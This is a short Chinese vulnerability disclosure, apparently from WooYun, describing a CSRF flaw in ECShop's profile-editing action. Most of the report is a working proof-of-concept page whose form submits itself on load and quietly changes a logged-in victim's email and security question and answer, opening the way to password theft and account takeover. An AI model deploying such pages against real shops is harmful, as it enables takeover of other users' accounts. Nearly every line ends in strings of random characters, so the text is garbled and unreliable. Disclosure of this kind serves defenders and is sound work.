简要描述:; J. h+ g/ G% k# a" Z6 M5 W
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现# k; S$ c9 o/ y3 r3 {3 L
& B; p n+ p- }) x3 V. m( V8 Y0 UDemo For:http://www.wooyun.org/bug.php?action=view&id=395
# n- O9 y' O8 ~2 k4 ~* ~
+ J: a8 g @( v1 s详细说明:
& x9 @# A. ]0 m% t$ g* p5 h2 `利用csrf和xss可以突破官方所说的“障碍”" E% i: U" b" {# p- E
xss版本已经有人说明
0 [+ N" G, S* p3 J8 u+ E6 e这里给出csrf版本
& j( a) `) w* a- ^2 [7 W! M# Z9 F4 }* [( U G
漏洞证明:
+ ^! M* o' c ?+ b8 A. V: ^" `<html>
- M, Q" N* G& @* X<body>* o9 ~3 S; U; u n+ e' n
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">% C7 t, p }& p. ]9 K# Q- O
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. G g( w) O/ O. T<INPUT TYPE="text" NAME="act" value="act_edit_profile">
. T6 F; F( K7 K1 w/ W/ @<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ b) Q( J. H# Q
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
7 ~' }# u' J: G) x0 n, g! I% t</body>
3 m d- V: D: n3 v2 n' x<script>
5 I# L d/ p+ n/ V: L3 \, Gdocument.forms[0].submit();: j$ u; I* N8 L2 ~
</script>' X$ h9 H4 Z/ U5 g9 s
</html>
. Q8 d/ o+ z+ s构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失' X7 C0 U+ |" |. w
/ B5 `1 B& t; r |